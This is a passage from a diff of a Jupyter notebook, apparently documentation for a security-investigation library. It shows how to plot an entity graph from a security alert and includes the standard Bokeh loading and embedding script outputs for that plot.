class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;800,</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_range&nbsp;=&nbsp;Range1d(id='1434', ...),</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_scale&nbsp;=&nbsp;LinearScale(id='1438', ...),</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_range&nbsp;=&nbsp;Range1d(id='1436', ...),</div></div><div class=\"1672\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_scale&nbsp;=&nbsp;LinearScale(id='1440', ...))</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"1673\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"1672\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ],
+      "text/plain": [
+       "Figure(id='1431', ...)"
+      ]
+     },
+     "execution_count": 5,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "sec_alert = SecurityAlert(pd.Series(sample_alert))\n",
+    "\n",
+    "graph = EntityGraph(sec_alert)\n",
+    "graph.plot()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "As can be seen above creating a graph from an Alert or SecurityAlert produces the same graph output. Here we can see the relationship between the entities and the alert, as well as between the two entities.\n",
+    "\n",
+    "Graphs can also be created with just an entity if that is the starting point of the investigation:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1675\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1675\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\": \"dM3QQsP+wXdHg42wTqW85BjZQdLNNIXqlPw/BgKoExPmTG7ZLML4EGqLMfqHT6ON\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\": \"8x57I4YuIfu8XyZfFo0XVr2WAT8EK4rh/uDe3wF7YuW2FNUSNEpJbsPaB1nJ2fz2\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\": \"3QTqdz9LyAm2i0sG5XTePsHec3UHWwVsrOL68SYRoAXsafvfAyqtQ+h440+qIBhS\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1675\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1676\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1676\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\": \"dM3QQsP+wXdHg42wTqW85BjZQdLNNIXqlPw/BgKoExPmTG7ZLML4EGqLMfqHT6ON\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\": \"8x57I4YuIfu8XyZfFo0XVr2WAT8EK4rh/uDe3wF7YuW2FNUSNEpJbsPaB1nJ2fz2\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\": \"3QTqdz9LyAm2i0sG5XTePsHec3UHWwVsrOL68SYRoAXsafvfAyqtQ+h440+qIBhS\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1676\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"eb4cc2c6-6543-467b-938d-8e11edf6e69b\" data-root-id=\"1677\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"d1f84ee3-4c61-4d9f-84fa-8570ffae256b\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"below\":[{\"id\":\"1688\"}],\"center\":[{\"id\":\"1691\"},{\"id\":\"1695\"},{\"id\":\"1727\"}],\"height\":800,\"left\":[{\"id\":\"1692\"}],\"renderers\":[{\"id\":\"1712\"}],\"title\":{\"id\":\"1678\"},\"toolbar\":{\"id\":\"1703\"},\"width\":800,\"x_range\":{\"id\":\"1680\"},\"x_scale\":{\"id\":\"1684\"},\"y_range\":{\"id\":\"1682\"},\"y_scale\":{\"id\":\"1686\"}},\"id\":\"1677\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"source\":{\"id\":\"1714\"}},\"id\":\"1716\",\"type\":\"CDSView\"},{\"attributes\":{\"end\":3,\"start\":-3},\"id\":\"1682\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1814\",\"type\":\"Selection\"},{\"attributes\":{\"data\":{\"end\":[],\"start\":[]},\"selected\":{\"id\":\"1814\"},\"selection_policy\":{\"id\":\"1815\"}},\"id\":\"1718\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"1815\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"edge_renderer\":{\"id\":\"1719\"},\"inspection_policy\":{\"id\":\"1802\"},\"layout_provider\":{\"id\":\"1721\"},\"node_renderer\":{\"id\":\"1715\"},\"selection_policy\":{\"id\":\"1803\"}},\"id\":\"1712\",\"type\":\"GraphRenderer\"},{\"attributes\":{\"data_source\":{\"id\":\"1718\"},\"glyph\":{\"id\":\"1717\"},\"hover_glyph\":null,\"muted_glyph\":null,\"view\":{\"id\":\"1720\"}},\"id\":\"1719\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1686\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1808\",\"type\":\"AllLabels\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"1702\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"source\":{\"id\":\"1718\"}},\"id\":\"1720\",\"type\":\"CDSView\"},{\"attributes\":{\"formatter\":{\"id\":\"1796\"},\"major_label_policy\":{\"id\":\"1795\"},\"ticker\":{\"id\":\"1693\"}},\"id\":\"1692\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"1809\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"end\":3,\"start\":-3},\"id\":\"1680\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1684\",\"type\":\"LinearScale\"},{\"attributes\":{\"callback\":null,\"tooltips\":[[\"node_type\",\"@node_type\"],[\"name\",\"@name\"],[\"description\",\"@description\"],[\"entitytype\",\"@entitytype\"]]},\"id\":\"1710\",\"type\":\"HoverTool\"},{\"attributes\":{},\"id\":\"1796\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"text\":\"www.contoso.com\",\"text_font_size\":\"10pt\",\"x\":0,\"x_offset\":5,\"y\":0,\"y_offset\":5},\"id\":\"1727\",\"type\":\"Label\"},{\"attributes\":{},\"id\":\"1803\",\"type\":\"NodesOnly\"},{\"attributes\":{},\"id\":\"1701\",\"type\":\"HelpTool\"},{\"attributes\":{\"data\":{\"color\":[\"green\"],\"description\":[\"www.contoso.com\"],\"end_time\":[null],\"entitytype\":[\"url\"],\"index\":[\"www.contoso.com\"],\"name\":[\"www.contoso.com\"],\"node_color\":[\"green\"],\"node_type\":[\"entity\"],\"source\":[\"{'AdditionalData': {}, 'Type': 'url', 'Url': 'www.contoso.com', 'edges': set()}\"],\"start_time\":[null]},\"selected\":{\"id\":\"1812\"},\"selection_policy\":{\"id\":\"1813\"}},\"id\":\"1714\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"field\":\"node_color\"},\"size\":{\"value\":25}},\"id\":\"1722\",\"type\":\"Circle\"},{\"attributes\":{\"data_source\":{\"id\":\"1714\"},\"glyph\":{\"id\":\"1722\"},\"hover_glyph\":null,\"muted_glyph\":null,\"view\":{\"id\":\"1716\"}},\"id\":\"1715\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"formatter\":{\"id\":\"1809\"},\"major_label_policy\":{\"id\":\"1808\"},\"ticker\":{\"id\":\"1689\"}},\"id\":\"1688\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"1700\",\"type\":\"ResetTool\"},{\"attributes\":{},\"id\":\"1689\",\"type\":\"BasicTicker\"},{\"attributes\":{\"axis\":{\"id\":\"1688\"},\"ticker\":null},\"id\":\"1691\",\"type\":\"Grid\"},{\"attributes\":{\"graph_layout\":{\"www.contoso.com\":[0,0]}},\"id\":\"1721\",\"type\":\"StaticLayoutProvider\"},{\"attributes\":{},\"id\":\"1812\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"1802\",\"type\":\"NodesOnly\"},{\"attributes\":{\"axis\":{\"id\":\"1692\"},\"dimension\":1,\"ticker\":null},\"id\":\"1695\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1813\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"1693\",\"type\":\"BasicTicker\"},{\"attributes\":{},\"id\":\"1717\",\"type\":\"MultiLine\"},{\"attributes\":{\"text\":\"Alert Entity graph\"},\"id\":\"1678\",\"type\":\"Title\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"1696\"},{\"id\":\"1697\"},{\"id\":\"1698\"},{\"id\":\"1699\"},{\"id\":\"1700\"},{\"id\":\"1701\"},{\"id\":\"1710\"}]},\"id\":\"1703\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"1697\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"1696\",\"type\":\"PanTool\"},{\"attributes\":{\"overlay\":{\"id\":\"1702\"}},\"id\":\"1698\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"1699\",\"type\":\"SaveTool\"},{\"attributes\":{},\"id\":\"1795\",\"type\":\"AllLabels\"}],\"root_ids\":[\"1677\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.3\"}};\n  var render_items = [{\"docid\":\"d1f84ee3-4c61-4d9f-84fa-8570ffae256b\",\"root_ids\":[\"1677\"],\"roots\":{\"1677\":\"eb4cc2c6-6543-467b-938d-8e11edf6e69b\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
